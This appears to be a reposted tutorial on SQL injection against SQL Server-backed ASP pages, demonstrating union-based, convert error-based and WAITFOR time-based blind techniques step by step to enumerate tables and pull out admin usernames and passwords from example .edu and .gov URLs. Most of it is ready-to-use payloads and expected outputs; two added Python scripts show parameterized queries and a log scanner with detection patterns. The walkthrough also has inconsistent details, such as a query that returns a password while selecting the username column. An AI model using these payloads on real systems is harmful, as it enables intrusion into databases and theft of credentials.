Toot – MySQL Injection


Here is a MySQL Injection tutorial that you can study; I got this tutorial from the author credited below.
[~] MsSQL – Union Attack. [~]

So let's say our target is: http://www.crysan.edu/manager.asp?id=14

We can find the column count with the ORDER BY clause.
This works just like the MySQL union-based method.

http://www.crysan.edu/manager.asp?id=14 ORDER BY 1--

We get something like:
Quote:
ADODB.Recordset Error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/ manager.asp, line 10

Let's increase 1 to 2, 2 to 3, and so on...

http://www.crysan.edu/manager.asp?id=14 ORDER BY 2--
http://www.crysan.edu/manager.asp?id=14 ORDER BY 3--
http://www.crysan.edu/manager.asp?id=14 ORDER BY 4--

http://www.crysan.edu/manager.asp?id=14 ORDER BY 13--

...until we get an error like this:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e14'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] The number of ORDER BY position 13 is outside the range of elements in the select list.

/ manager.asp, line 9

This means our column count is: 12.

If this does not work, use the string variant:
http://www.crysan.edu/manager.asp?id=-14' and 1=2 ORDER BY 13--

This should work🙂; if not, you can try the other two methods.

Now we select every column to see which one echoes back into the page, so we can read out the details we want.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

As we can see, 2, 12, 10 etc. are reflected in the page and can be used for our attack.
I will use 12.

Let's see if we can get the name of the current database.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,db_name()--

Now we can see the current database name where the number 12 was.
Let's say the database name in our example is: crysan_db

Let's read the tables from crysan_db.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables--

Now we get the first table of the database.

Let's say it's: tutorial_pictures.
That's not the table we want to see.

So let's see what the name of the next table is.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures')--

Now we see the next table: tutorial_category.
Hmm, still not the table we would like to see.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures','tutorial_category')--

Do this until you find the table you want.
If the result is blank, you have reached the end.

Finally we get this: tutorial_admin_users.
Fine, let's go to the next step.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users'--

We will see the first column in the table.
Let's say it's: id

So what do we do next? Right!
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('id')--

Now we can see the next column is: t_usr

Let's redo the last step to get the next column.
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('t_usr')--

Result: t_pwd

Finally we have all of this:

Database: crysan_db
Table: tutorial_admin_users
Columns: id, t_usr, t_pwd

Let's get the admin details =)

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users--

Result: admin

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users--

Result: 5683

If we want to get the details of the next user:
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users where t_usr not in ('admin')--
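As an added defensive example (not part of the original tutorial and not the author's code), the Python script below reproduces the shape of the `manager.asp?id=` lookup in three forms: string concatenation, which is what lets the `ORDER BY 13--` column-count probe and the `UNION SELECT` reach the database as SQL; a bound parameter, which treats the whole `?id=` string as a value; and a validated handler that rejects non-integer ids before any SQL runs. SQLite stands in for SQL Server so the script runs offline; the `manager` table, the `tutorial_admin_users` rows, and the `probe` helper are constructed for this example and are not from the page.

```python
import sqlite3

# Constructed in-memory stand-in for the database behind manager.asp. The page's
# target is SQL Server behind classic ASP; SQLite is used here only so the script
# runs offline. Table layout and rows are invented for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE manager (id INTEGER, title TEXT, body TEXT);
        INSERT INTO manager VALUES (14, 'Welcome', 'public page');
        CREATE TABLE tutorial_admin_users (id INTEGER, t_usr TEXT, t_pwd TEXT);
        INSERT INTO tutorial_admin_users VALUES (1, 'admin', 'constructed-placeholder');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern the tutorial exploits: the raw ?id= value is pasted into the SQL text."""
    sql = "SELECT id, title, body FROM manager WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Fix: the value is bound, so it can never change the statement's structure."""
    return conn.execute(
        "SELECT id, title, body FROM manager WHERE id=?", (raw_id,)
    ).fetchall()


def lookup_validated(conn, raw_id):
    """Defence in depth: reject anything that is not an integer before it reaches SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer")
    return lookup_parameterized(conn, id_value)


def probe(conn, handler, payload):
    """Run one request through a handler and summarise what the client observes:
    ('error', message)   mirrors the ODBC error pages shown in the tutorial,
    ('rejected', reason) means input validation stopped the request,
    ('rows', n)          mirrors a page that rendered n result rows."""
    try:
        rows = handler(conn, payload)
    except ValueError as exc:
        return ("rejected", str(exc))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("rows", len(rows))


if __name__ == "__main__":
    db = make_db()
    payloads = ["14", "14 ORDER BY 13--",
                "14 UNION SELECT 1,2,t_usr FROM tutorial_admin_users--"]
    handlers = [("concat", lookup_vulnerable), ("param", lookup_parameterized),
                ("validated", lookup_validated)]
    for payload in payloads:
        for name, handler in handlers:
            print(f"{name:9} {payload!r:58} -> {probe(db, handler, payload)}")
```

With the concatenating handler the `ORDER BY 13--` request produces a database error (the column-count oracle the tutorial relies on) and the union request returns a second row from the admin table; with the bound parameter both requests simply match no row, and the validated handler refuses them before the database sees anything, which also removes the error message the error-based variant needs.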

[~] MsSQL – Convert Attack. [~]

This is my favourite way :3
Our example target for this is: http://sub.crysan.gov/news.asp?game=1

Okay, let's get the database.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,db_name)--

We should get an error message like this:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'intranet' to a column of data type int.

news.asp, line 9

Okay, now we know that the database name is: intranet
Let's get the tables.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

Now the same game as with the union attack.
Through that syntax we got the first table from the database.
It's: apfel_ficker

Time for the next table.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('apfel_ficker')))--

The next table is: sperma_schleuder

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('apfel_ficker','sperma_schleuder')))--

We do this until we get what we want.
Let's say we found: lappen_user

Of course, we now need to get the columns.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='lappen_user'))--

It's the same thing here as above.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='lappen_user+and+column_name+not+in+('id')))--
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='lappen_user+and+column_name+not+in+('id','username')))--

Columns: ID, username, passwd

Now we only need to read the data out.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user))--
Now we see that the username is admin.
Let's get the password.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+passwd+from+lappen_user))--
Now we have the password.

If we want to get the details of the next user:
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user+where+username+not+in+('admin')))--

[~] MsSQL – Blind (Time Delay). [~]

Okay, this will be the last way I show you.
Why not normal blind? Because this seems to work better.

Target: http://crysan.cat/wrd/nyan.asp?cat=155

If we do this:
http://crysan.cat/wrd/nyan.asp?cat=155; WAITFOR DELAY '00:00:05'--

the database takes 5 seconds to respond.
Time to get the database🙂

http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=1) WAITFOR DELAY '00:00:05'--
We get an error straight away.

The 1 stands for the character count. If the database name is intra, it has 5 characters, so our syntax would look like:
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=5) WAITFOR DELAY '00:00:05'--

Just raise the number until the site takes 5 seconds to respond/load.
For example, if we try
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=24) WAITFOR DELAY '00:00:05'--

and the page takes 5 seconds to load, the database name is 24 characters long.
This is important to understand for the next steps.

It's time to get the name of the db.
We know that our db name is 5 characters long.

We are going to use ASCII codes.
Here is an ASCII-to-char list: http://pastebin.com/BfzH9EXt
You will need it for the next step.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>97) WAITFOR DELAY '00:00:05'-- - Loads directly.
(97 is where you enter the ASCII code; just change it to the code you want to test.)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>98) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

Now we know the first char of the database name is: c

Now we need to get the 2nd char.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>111) WAITFOR DELAY '00:00:05'-- - Loads directly.
(As you can see, I changed the 1 to 2, meaning we now want the 2nd char. Change it to 3 for the 3rd char, and so on.)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>112) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>113) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

We now know the 2nd char is: q

Keep doing that until you have all 5 chars.
Let's just say the database is: intra.

Time to get the tables.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=120) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=121) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=122) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

The second char is: z
Did you get the point? Yeah? Fine.

Let's say the table is: admin

Now it's time to... right, drink a coffee and get the columns.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=99) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=100) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

I guess you know the rest😉.
Now the final part...

The column we got from the step above is: usr_name

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),1,1))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

First char is: a

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=98) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

I think I don't need to continue here; I guess you understand it now.
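As an added example from the detection side (not part of the original post and not the author's code), the Python below scans constructed IIS-style log lines for the request shapes used in all three sections: the `ORDER BY n` / `UNION SELECT` probes, the `convert(int, ...)` error trick, and the `WAITFOR DELAY` time-based requests. It also flags a response that took several seconds, which, besides the query string itself, is the only server-side trace the time-based variant leaves, and flags HTTP 500 responses on the union and convert probes, since those techniques depend on the ODBC error page being returned. The log layout (date, time, method, URI stem, query, status, time-taken in ms), the sample lines, the pattern names and the 4000 ms threshold are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines in a trimmed IIS W3C shape:
# date time method uri-stem uri-query status time-taken(ms). Not real traffic.
SAMPLE_LOG = """\
2013-04-01 10:00:01 GET /manager.asp id=14 200 31
2013-04-01 10:00:05 GET /manager.asp id=14+ORDER+BY+13-- 500 28
2013-04-01 10:00:09 GET /manager.asp id=14+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,db_name()-- 200 35
2013-04-01 10:00:20 GET /manager.asp id=14+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,table_name+from+information_schema.tables-- 200 40
2013-04-01 10:01:12 GET /news.asp game=1+and+1=convert(int,db_name)-- 500 30
2013-04-01 10:02:40 GET /wrd/nyan.asp cat=155;+WAITFOR+DELAY+%2700:00:05%27-- 200 5042
2013-04-01 10:02:41 GET /wrd/nyan.asp cat=155 200 29
"""

# One pattern per technique described in the tutorial (names are assumptions).
PATTERNS = {
    "union_probe": re.compile(r"\b(order\s+by\s+\d+|union\s+(all\s+)?select)\b", re.I),
    "error_based": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "time_based": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "schema_enum": re.compile(r"information_schema\.|\bsysobjects\b", re.I),
}

# Time-based injection returns no error; a slow response together with a
# WAITFOR request is the corroborating signal. Threshold is an assumption.
SLOW_MS = 4000


def classify_query(query):
    """Return the set of technique tags found in a URL-encoded query string."""
    decoded = unquote_plus(query)
    return {tag for tag, rx in PATTERNS.items() if rx.search(decoded)}


def analyze_log(text):
    """Parse the constructed log lines; return findings as (stem, decoded query, tags)."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # header or malformed line
        _date, _time, _method, stem, query, status, time_taken = parts
        tags = classify_query(query)
        if "time_based" in tags and int(time_taken) >= SLOW_MS:
            tags.add("slow_response")
        if tags and status == "500":
            tags.add("server_error")  # the error pages the union/convert probes rely on
        if tags:
            findings.append((stem, unquote_plus(query), tags))
    return findings


if __name__ == "__main__":
    for stem, query, tags in analyze_log(SAMPLE_LOG):
        print(f"{stem:15} {sorted(tags)}\n    {query}")
```

Run over the sample, the scanner reports five of the seven lines: the ORDER BY probe and the convert request are tagged with `server_error` because they came back as 500s, the `information_schema` request is additionally tagged `schema_enum`, and the WAITFOR request is tagged `slow_response` because it took over five seconds while the identical URL without the payload took 29 ms; the two benign requests produce no finding.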

Author: Ilyas robert
